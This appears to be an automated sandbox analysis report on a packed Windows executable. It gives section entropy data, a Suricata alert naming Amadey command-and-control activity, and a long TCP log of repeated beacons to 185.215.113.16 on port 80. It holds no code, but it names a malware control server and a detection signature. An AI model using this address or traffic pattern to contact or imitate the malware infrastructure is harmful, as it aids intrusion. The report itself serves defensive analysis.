IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4b2870	0x18	lstpvczs
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	0e2a32146978c6a5733f381333eb1035	False	0.9974508259536785	data	7.986442011081729	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	17bd456aaddbb3ecd11114cf2151b6c0	False	0.583984375	data	4.523449810757572	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2ab000	0x200	04d293280b541e2e5cdb4b48e261f498	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lstpvczs	0x316000	0x19d000	0x19cc00	ce8f1e11b1060bf41d7f6eec71cc9d90	False	0.9943476491520291	data	7.9538233396584435	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
hyconjie	0x4b3000	0x1000	0x400	b0129aeb0e0e6800e25f3eb872c986fd	False	0.8369140625	data	6.407938823102012	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4b4000	0x3000	0x2200	b409213883e0276dc2da38c03e6a8992	False	0.006548713235294118	DOS executable (COM)	0.019571456231530684	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4b28d0	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T22:42:25.732711+0200	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	62691	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 22:42:02.803668022 CEST	62669	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:02.809027910 CEST	80	62669	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:02.809148073 CEST	62669	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:02.809284925 CEST	62669	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:02.814151049 CEST	80	62669	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:03.529727936 CEST	80	62669	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:03.529959917 CEST	62669	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:03.532280922 CEST	62669	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:03.537291050 CEST	80	62669	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:03.796063900 CEST	80	62669	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:03.796144009 CEST	62669	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:03.903842926 CEST	62669	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:03.904166937 CEST	62670	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:03.909173012 CEST	80	62670	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:03.909190893 CEST	80	62669	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:03.909274101 CEST	62669	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:03.909275055 CEST	62670	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:03.909389019 CEST	62670	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:03.914273977 CEST	80	62670	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:04.620893002 CEST	80	62670	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:04.621051073 CEST	62670	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:04.621855021 CEST	62670	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:04.626733065 CEST	80	62670	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:04.849298954 CEST	80	62670	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:04.849375963 CEST	62670	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:04.966434956 CEST	62670	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:04.966701984 CEST	62671	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:04.972295046 CEST	80	62671	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:04.972528934 CEST	62671	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:04.972528934 CEST	62671	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:04.973562002 CEST	80	62670	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:04.973634005 CEST	62670	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:04.977556944 CEST	80	62671	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:05.704673052 CEST	80	62671	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:05.704775095 CEST	62671	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:05.705491066 CEST	62671	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:05.710995913 CEST	80	62671	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:05.940376997 CEST	80	62671	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:05.940509081 CEST	62671	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:06.044714928 CEST	62671	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:06.045011044 CEST	62672	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:06.049823046 CEST	80	62672	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:06.049894094 CEST	62672	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:06.050055981 CEST	62672	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:06.050107956 CEST	80	62671	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:06.050160885 CEST	62671	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:06.055140018 CEST	80	62672	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:06.775963068 CEST	80	62672	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:06.776045084 CEST	62672	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:06.776660919 CEST	62672	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:06.783857107 CEST	80	62672	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:07.014902115 CEST	80	62672	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:07.015021086 CEST	62672	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:07.122601032 CEST	62672	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:07.122817039 CEST	62673	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:07.127856970 CEST	80	62672	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:07.127873898 CEST	80	62673	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:07.127933025 CEST	62672	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:07.127978086 CEST	62673	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:07.128082991 CEST	62673	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:07.132932901 CEST	80	62673	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:07.877765894 CEST	80	62673	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:07.877861023 CEST	62673	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:07.878598928 CEST	62673	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:07.883341074 CEST	80	62673	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:08.105499983 CEST	80	62673	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:08.105612993 CEST	62673	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:08.216509104 CEST	62673	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:08.216828108 CEST	62674	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:08.221718073 CEST	80	62674	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:08.221787930 CEST	62674	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:08.221957922 CEST	80	62673	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:08.221961021 CEST	62674	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:08.222007990 CEST	62673	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:08.227092028 CEST	80	62674	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:08.966223001 CEST	80	62674	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:08.966311932 CEST	62674	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:08.969849110 CEST	62674	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:08.974641085 CEST	80	62674	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:09.207102060 CEST	80	62674	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:09.207320929 CEST	62674	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:09.310091972 CEST	62674	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:09.310480118 CEST	62675	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:09.621969938 CEST	62674	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:09.680243969 CEST	80	62675	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:09.680351019 CEST	62675	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:09.680387974 CEST	80	62674	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:09.680552959 CEST	80	62674	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:09.680563927 CEST	62675	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:09.680599928 CEST	62674	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:09.685600996 CEST	80	62675	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:10.383949041 CEST	80	62675	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:10.384035110 CEST	62675	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:10.385018110 CEST	62675	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:10.389906883 CEST	80	62675	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:10.613161087 CEST	80	62675	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:10.613246918 CEST	62675	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:10.716573954 CEST	62675	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:10.716883898 CEST	62676	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:10.721673012 CEST	80	62675	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:10.721694946 CEST	80	62676	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:10.721734047 CEST	62675	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:10.721798897 CEST	62676	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:10.721990108 CEST	62676	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:10.726766109 CEST	80	62676	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:11.463812113 CEST	80	62676	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:11.464019060 CEST	62676	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:11.466891050 CEST	62676	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:11.472161055 CEST	80	62676	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:11.695000887 CEST	80	62676	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:11.698780060 CEST	62676	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:11.810050011 CEST	62676	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:11.810398102 CEST	62677	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:11.815256119 CEST	80	62677	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:11.815344095 CEST	80	62676	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:11.815371990 CEST	62677	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:11.815401077 CEST	62676	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:11.815510035 CEST	62677	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:11.821717978 CEST	80	62677	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:12.548254013 CEST	80	62677	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:12.548345089 CEST	62677	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:12.549175024 CEST	62677	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:12.554781914 CEST	80	62677	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:12.782916069 CEST	80	62677	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:12.783010006 CEST	62677	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:12.888463974 CEST	62677	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:12.888933897 CEST	62678	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:12.893829107 CEST	80	62678	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:12.893923998 CEST	62678	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:12.894133091 CEST	62678	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:12.894474983 CEST	80	62677	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:12.894535065 CEST	62677	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:12.898969889 CEST	80	62678	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:13.586543083 CEST	80	62678	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:13.586683989 CEST	62678	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:13.587414026 CEST	62678	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:13.592219114 CEST	80	62678	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:13.810347080 CEST	80	62678	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:13.810411930 CEST	62678	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:13.919688940 CEST	62678	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:13.920139074 CEST	62679	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:13.924837112 CEST	80	62678	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:13.924930096 CEST	62678	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:13.924985886 CEST	80	62679	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:13.925064087 CEST	62679	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:13.925261021 CEST	62679	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:13.930116892 CEST	80	62679	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:14.615531921 CEST	80	62679	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:14.615756035 CEST	62679	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:14.616544962 CEST	62679	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:14.621337891 CEST	80	62679	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:14.920463085 CEST	80	62679	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:14.920574903 CEST	62679	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:15.028825998 CEST	62679	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:15.029234886 CEST	62680	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:15.033993959 CEST	80	62679	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:15.034024954 CEST	80	62680	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:15.034082890 CEST	62679	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:15.034146070 CEST	62680	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:15.034363031 CEST	62680	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:15.039150953 CEST	80	62680	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:15.823436975 CEST	80	62680	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:15.823556900 CEST	62680	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:15.824475050 CEST	62680	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:15.829283953 CEST	80	62680	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:16.050848007 CEST	80	62680	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:16.050993919 CEST	62680	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:16.158755064 CEST	62680	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:16.163367987 CEST	62681	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:16.163990021 CEST	80	62680	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:16.164052963 CEST	62680	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:16.168191910 CEST	80	62681	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:16.168287039 CEST	62681	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:16.204276085 CEST	62681	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:16.209048986 CEST	80	62681	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:16.955229044 CEST	80	62681	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:16.955355883 CEST	62681	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:16.956394911 CEST	62681	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:16.961647987 CEST	80	62681	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:17.191816092 CEST	80	62681	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:17.191953897 CEST	62681	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:17.295372963 CEST	62681	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:17.295823097 CEST	62683	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:17.300710917 CEST	80	62681	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:17.300724030 CEST	80	62683	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:17.300776958 CEST	62681	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:17.300812960 CEST	62683	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:17.301146030 CEST	62683	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:17.305938005 CEST	80	62683	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:18.066307068 CEST	80	62683	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:18.066472054 CEST	62683	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:18.067373037 CEST	62683	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:18.072251081 CEST	80	62683	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:18.296109915 CEST	80	62683	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:18.296195984 CEST	62683	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:18.404110909 CEST	62683	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:18.404500961 CEST	62685	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:18.409135103 CEST	80	62683	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:18.409214973 CEST	62683	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:18.409435034 CEST	80	62685	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:18.409511089 CEST	62685	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:18.409636021 CEST	62685	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:18.414412022 CEST	80	62685	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:19.108939886 CEST	80	62685	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:19.109025955 CEST	62685	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:19.109823942 CEST	62685	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:19.114681959 CEST	80	62685	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:19.337654114 CEST	80	62685	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:19.337774992 CEST	62685	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:19.450753927 CEST	62685	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:19.451162100 CEST	62686	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:19.455998898 CEST	80	62686	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:19.456043959 CEST	80	62685	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:19.456085920 CEST	62686	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:19.456124067 CEST	62685	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:19.456376076 CEST	62686	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:19.462054968 CEST	80	62686	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:20.152440071 CEST	80	62686	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:20.152590990 CEST	62686	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:20.155742884 CEST	62686	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:20.160949945 CEST	80	62686	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:20.379661083 CEST	80	62686	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:20.379792929 CEST	62686	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:20.482413054 CEST	62686	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:20.483082056 CEST	62687	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:20.487596035 CEST	80	62686	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:20.487668991 CEST	62686	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:20.487859011 CEST	80	62687	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:20.487941980 CEST	62687	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:20.488101959 CEST	62687	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:20.493288040 CEST	80	62687	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:21.410228014 CEST	80	62687	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:21.410324097 CEST	62687	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:21.410731077 CEST	80	62687	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:21.410784006 CEST	62687	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:21.410934925 CEST	62687	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:21.416398048 CEST	80	62687	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:21.638104916 CEST	80	62687	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:21.638235092 CEST	62687	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:21.747870922 CEST	62687	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:21.748277903 CEST	62688	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:21.752916098 CEST	80	62687	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:21.753103018 CEST	80	62688	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:21.753187895 CEST	62687	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:21.753220081 CEST	62688	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:21.753366947 CEST	62688	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:21.758194923 CEST	80	62688	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:22.457644939 CEST	80	62688	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:22.457772970 CEST	62688	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:22.458580017 CEST	62688	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:22.463401079 CEST	80	62688	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:22.689250946 CEST	80	62688	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:22.689950943 CEST	62688	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:22.794667959 CEST	62688	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:22.795017958 CEST	62689	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:22.799913883 CEST	80	62689	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:22.800067902 CEST	80	62688	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:22.800069094 CEST	62689	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:22.800123930 CEST	62688	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:22.800272942 CEST	62689	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:22.805108070 CEST	80	62689	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:23.545484066 CEST	80	62689	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:23.545614958 CEST	62689	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:23.546443939 CEST	62689	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:23.551342964 CEST	80	62689	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:23.782258987 CEST	80	62689	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:23.782351017 CEST	62689	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:23.888364077 CEST	62689	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:23.888782978 CEST	62690	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:23.893443108 CEST	80	62689	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:23.893537998 CEST	62689	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:23.893596888 CEST	80	62690	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:23.893667936 CEST	62690	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:23.893906116 CEST	62690	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:23.898880959 CEST	80	62690	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:24.611094952 CEST	80	62690	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:24.611258030 CEST	62690	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:24.611999035 CEST	62690	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:24.617434025 CEST	80	62690	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:24.840203047 CEST	80	62690	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:24.840313911 CEST	62690	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:24.951817989 CEST	62690	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:24.952169895 CEST	62691	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:24.957350016 CEST	80	62691	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:24.957449913 CEST	62691	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:24.957628012 CEST	62691	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:24.957715034 CEST	80	62690	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:24.957767010 CEST	62690	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:24.962590933 CEST	80	62691	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:25.732588053 CEST	80	62691	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:25.732711077 CEST	62691	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:25.733530998 CEST	62691	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:25.738368988 CEST	80	62691	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:25.958981037 CEST	80	62691	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:25.959116936 CEST	62691	80	192.168.2.5	185.215.113.16
